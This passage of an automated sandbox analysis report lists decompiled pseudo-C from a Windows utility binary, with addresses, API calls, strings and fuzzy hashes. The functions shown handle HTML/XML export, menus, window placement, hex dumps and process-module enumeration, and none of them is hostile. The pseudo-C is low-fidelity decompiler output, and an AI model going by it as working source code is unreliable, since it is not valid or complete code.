SendMessageW.USER32(?,0000105F,?,?), ref: 004032A0
SetFocus.USER32(?), ref: 00403326

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
Instruction ID: e5884d61c50a84840a295c8cd46100b63ab271327737e15352f16c4cecb35b78
Opcode Fuzzy Hash: ab58b64ca0b35e7ad8e6b708a6aaa6c08aba0ce3a91fa458086e11feb534d575
Instruction Fuzzy Hash: 46418A35900219BFDB20EF85CD89EAFBF78EF04354F1040AAF908B6291D3719A40DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408AFA, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00408AFA(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t94;
				intOrPtr* _t97;
				void* _t99;
				void* _t101;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t101 = _t99 + 0x18;
				asm("movsw");
				E00408857(__ebx, 0, _a4, L"<tr>");
				_t94 = 0;
				if( *((intOrPtr*)(__ebx + 0x34)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x38)) + _t94 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x48)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t97 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t94, _t97,  &_v28);
						E0040DBA9(_v28,  &_v108);
						E0040DBDA( *((intOrPtr*)( *_t97))(_v8,  *((intOrPtr*)(_t73 + 0x68))),  *(_t73 + 0x6c));
						 *((intOrPtr*)( *_t73 + 0x54))( *(_t73 + 0x6c), _t97, _v8);
						_t67 =  *(_t73 + 0x6c);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
							_pop(0);
						}
						E0040DC79( &_v28,  *((intOrPtr*)(_t73 + 0x70)),  *(_t73 + 0x6c));
						_push( *((intOrPtr*)(_t73 + 0x70)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x68)));
						L0040DFD6();
						_t101 = _t101 + 0x1c;
						E00408857(_t73, 0, _a4,  *((intOrPtr*)(_t73 + 0x68)));
						_t94 = _t94 + 1;
					} while (_t94 <  *((intOrPtr*)(_t73 + 0x34)));
				}
				return E00408857(_t73, 0, _a4, L"\r\n");
			}

0x00408afa
0x00408b07
0x00408b08
0x00408b15
0x00408b20
0x00408b20
0x00408b2c
0x00408b2e
0x00408b33
0x00408b38
0x00408b3e
0x00408b41
0x00408b47
0x00408b52
0x00408b58
0x00408b5a
0x00408b5a
0x00408b5d
0x00408b60
0x00408b64
0x00408b68
0x00408b6c
0x00408b76
0x00408b7f
0x00408b89
0x00408b9f
0x00408baf
0x00408bb2
0x00408bb5
0x00408bbb
0x00408bc9
0x00408bcf
0x00408bcf
0x00408bd9
0x00408bde
0x00408be4
0x00408be5
0x00408be8
0x00408bed
0x00408bf0
0x00408bf5
0x00408c00
0x00408c05
0x00408c06
0x00408b3e
0x00408c21

APIs

wcscat.MSVCRT ref: 00408BC9
_snwprintf.MSVCRT ref: 00408BF0

Strings

<td bgcolor=#%s>%s, xrefs: 00408B18
 , xrefs: 00408BC3
<td bgcolor=#%s nowrap>%s, xrefs: 00408B0A
<tr>, xrefs: 00408B22

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
Instruction ID: 96aa4744b540e0de5a537674df1821739e57c2366694ca0e95279aca4d83ea93
Opcode Fuzzy Hash: aacd1c3f04bbbde4388d7715a2edef3f998899fbad5d42021ae6a7ad680bf7af
Instruction Fuzzy Hash: 10318D31900208AFDF10AF55CC85E9A7B75FF04320F1040BAF855AB2E2DB35A945DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00406E97, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00406E97(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040E340(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E00406E97(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x412c34 =  *0x412c34 + 1;
							_t32 =  *0x412c34; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406E5E(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}

0x00406e97
0x00406e9a
0x00406ea2
0x00406ead
0x00406eb3
0x00406eb7
0x00406ebb
0x00406f81
0x00406f87
0x00000000
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ecc
0x00406ed1
0x00406ed8
0x00406ee7
0x00406eef
0x00406ef7
0x00406eff
0x00406f03
0x00406f08
0x00406f10
0x00000000
0x00000000
0x00406f17
0x00406f62
0x00406f62
0x00406f66
0x00406f68
0x00406f69
0x00406f6d
0x00406f70
0x00406f75
0x00406f75
0x00000000
0x00406f66
0x00406f20
0x00406f29
0x00406f2b
0x00406f2b
0x00406f32
0x00406f36
0x00406f3b
0x00406f45
0x00406f4b
0x00406f50
0x00406f50
0x00406f3d
0x00406f3d
0x00406f3d
0x00406f3d
0x00406f3b
0x00406f5b
0x00406f61
0x00000000
0x00406f78
0x00406f78
0x00406f79
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00406EAD
memset.MSVCRT ref: 00406ECC
GetMenuItemInfoW.USER32 ref: 00406F08
wcschr.MSVCRT ref: 00406F20

Strings

6, xrefs: 00406EEF
0, xrefs: 00406EE7

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
Instruction ID: 1dbbb6522b92818e37563bbb7cb847876382a1d5db42aae0addc6953e8b82e52
Opcode Fuzzy Hash: a0b7b54f04bcc436da1d99830b0d0b16883f872afdca66473e688fd6b38d6a97
Instruction Fuzzy Hash: 9021BF31105345ABC7209F61E84599FB7B8FB84754F000A3FF645A2280E7769A24CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004019D2, Relevance: 10.6, APIs: 7, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004019D2(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t26;
				int _t30;
				void* _t33;
				int _t36;
				int _t37;
				int _t40;
				int _t49;

				_t33 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x208)) == 0) {
					return _t26;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t40 = GetSystemMetrics(0x4c);
					_t30 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t40 = 0;
						_t30 = 0;
					} else {
						_v8 = _v8 + _t40;
						_v12 = _v12 + _t30;
					}
					_t49 = _v20 - _v28;
					if(_t49 > 0x14) {
						_t37 = _v24;
						_t36 = _v16 - _t37;
						if(_t36 > 0x14 && _v20 > _t40 + 5) {
							_t30 = _t30 + 0xfffffff6;
							if(_t37 >= _t30) {
								_t30 = _v28;
								if(_t30 + 0x14 < _v8 && _t37 + 0x14 < _v12 &&  *((intOrPtr*)(_t33 + 0x250)) != 0) {
									_t30 = SetWindowPos( *(_t33 + 0x208), 0, _t30, _t37, _t49, _t36, 0x204);
								}
							}
						}
					}
					return _t30;
				}
			}

0x004019d2
0x004019df
0x00401a94
0x004019e5
0x004019f0
0x004019f1
0x004019f2
0x004019f3
0x00401a00
0x00401a07
0x00401a0e
0x00401a10
0x00401a17
0x00401a2b
0x00401a30
0x00401a33
0x00401a35
0x00401a1e
0x00401a1e
0x00401a21
0x00401a21
0x00401a3a
0x00401a40
0x00401a45
0x00401a48
0x00401a4d
0x00401a57
0x00401a5c
0x00401a5e
0x00401a67
0x00401a8b
0x00401a8b
0x00401a67
0x00401a5c
0x00401a4d
0x00000000
0x00401a92

APIs

GetSystemMetrics.USER32 ref: 004019FC
GetSystemMetrics.USER32 ref: 00401A03
GetSystemMetrics.USER32 ref: 00401A0A
GetSystemMetrics.USER32 ref: 00401A10
GetSystemMetrics.USER32 ref: 00401A27
GetSystemMetrics.USER32 ref: 00401A2E
SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000204,?,?,?,?,?,004019CF), ref: 00401A8B

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$Window
String ID:
API String ID: 1155976603-0
Opcode ID: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
Instruction ID: e852b1759cb622fbc777dcf2117f8c3e284781620e86bac7d74114db1399c759
Opcode Fuzzy Hash: 17a53185f7517543453a4be3c81a3bbd36f75940ad8d5731b7ecdc36ba319df0
Instruction Fuzzy Hash: 27215C72E4221AEBDF10DFA88D496AF7B71EF40320F1141BAD904BB2D1D674A981CE94

Uniqueness

Uniqueness Score: -1.00%

Function 00405C17, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C17(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v24;
				long _v280;
				long _v536;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
						wcscpy(_a4,  &_v280);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v536);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40f454);
				}
				return _a4;
			}

0x00405c17
0x00405c28
0x00405c3b
0x00000000
0x00405c45
0x00405c5f
0x00405c74
0x00405c84
0x00405c91
0x00405ca0
0x00405ca5
0x00405caa
0x00405caa
0x00405cb2
0x00405cb8
0x00405cc0

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
wcscpy.MSVCRT ref: 00405C84
wcscat.MSVCRT ref: 00405C91
wcscat.MSVCRT ref: 00405CA0
wcscpy.MSVCRT ref: 00405CB2

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D33, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040DFD6();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

0x00405d33
0x00405d3c
0x00405d53
0x00405d58
0x00405d5c
0x00405d5f
0x00405d61
0x00405d68
0x00405d69
0x00405d74
0x00405d79
0x00405d7a
0x00405d7f
0x00405d84
0x00405d8c
0x00405d92
0x00405d97
0x00405d9b
0x00405da1
0x00405da9
0x00405daf
0x00405da1
0x00405db8
0x00405dbd
0x00405dc5
0x00405dcc

APIs

memset.MSVCRT ref: 00405D53
_snwprintf.MSVCRT ref: 00405D7A
wcscat.MSVCRT ref: 00405D8C
wcscat.MSVCRT ref: 00405DA9
wcscat.MSVCRT ref: 00405DB8

Strings

%2.2X, xrefs: 00405D69

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88

Uniqueness

Uniqueness Score: -1.00%

Function 004093B3, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t27 = __ecx;
				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00408857(_t16, _t27);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E004086F5(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040DFD6();
				return E00408857(_t29, _t29, _a4,  &_v1028);
			}

0x004093b3
0x004093cf
0x004093d1
0x004093d8
0x004093e6
0x004093ed
0x004093f8
0x004093fa
0x00409403
0x004093fc
0x004093fc
0x004093fc
0x0040940b
0x00409414
0x00409418
0x0040941e
0x00409425
0x00409426
0x00409431
0x00409436
0x00409437
0x00409454

APIs

memset.MSVCRT ref: 004093D8
memset.MSVCRT ref: 004093ED
_snwprintf.MSVCRT ref: 00409437

Strings

<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
<%s>, xrefs: 00409426
<?xml version="1.0" ?>, xrefs: 004093FC

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDA7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E004055FF(0xff,  &_v1036, _v8);
				E004056C9(_t34, __esi);
				return 1;
			}

0x0040ddbc
0x0040ddcb
0x0040dddc
0x0040ddeb
0x0040de0c
0x00000000
0x0040de30
0x0040de17
0x0040de1d
0x0040de25
0x00000000

APIs

wcscpy.MSVCRT ref: 0040DDBC
wcscat.MSVCRT ref: 0040DDCB
wcscat.MSVCRT ref: 0040DDDC
wcscat.MSVCRT ref: 0040DDEB
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05

Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C

Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5

Strings

\StringFileInfo\, xrefs: 0040DDB6

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC6, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00406CEB
wcscpy.MSVCRT ref: 00406D0E

Strings

menu_%d, xrefs: 00406CCF
strings, xrefs: 00406CF9
general, xrefs: 00406D04
dialog_%d, xrefs: 00406CDF

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBD8, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040E340(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E0040591F() == 0) {
					L12:
					__eflags =  *0x41325c - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x4128dc(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x4128d4(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E0040CDF8(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x4128d0(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x413260 - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x4128e0() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
										E0040CAF2( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x4128e4() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E0040CDF8(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x0040cbdb
0x0040cbe3
0x0040cbeb
0x0040cbed
0x0040cbf8
0x0040cd1b
0x0040cd1b
0x0040cd21
0x0040cd27
0x0040cd2d
0x0040cd33
0x0040cd36
0x0040cd3a
0x0040cd4e
0x0040cd56
0x0040cd5d
0x0040cddf
0x0040cddf
0x0040cde1
0x00000000
0x00000000
0x0040cd70
0x0040cd7c
0x0040cd8d
0x0040cd91
0x0040cd9d
0x0040cdab
0x0040cdae
0x0040cdbd
0x0040cdc4
0x0040cdc9
0x0040cdcb
0x0040cdd9
0x00000000
0x0040cdd9
0x00000000
0x0040cdcb
0x00000000
0x0040cddf
0x0040cd3a
0x0040cbfe
0x0040cbfe
0x0040cc04
0x00000000
0x0040cc0a
0x0040cc13
0x0040cc1b
0x0040cc1f
0x0040cc29
0x0040cc2a
0x0040cc36
0x0040cc37
0x0040cc40
0x0040cc46
0x0040cc46
0x0040cc4b
0x0040cc53
0x0040cc55
0x0040cc5f
0x0040cc6d
0x0040cc75
0x0040cc85
0x0040cc8d
0x0040cc94
0x0040cc9c
0x0040ccad
0x0040ccb1
0x0040ccc2
0x0040ccc7
0x0040cccd
0x0040ccce
0x0040ccd2
0x0040ccde
0x0040cce4
0x0040ccef
0x0040ccef
0x0040cd05
0x00000000
0x00000000
0x0040cd0b
0x0040cd10
0x0040cc5d
0x0040cc5d
0x00000000
0x00000000
0x0040cd16
0x00000000
0x0040cd10
0x0040cc5f
0x0040cc55
0x0040cde3
0x0040cde7
0x0040cde7
0x0040cc1f
0x0040cc04
0x0040cdf7

APIs

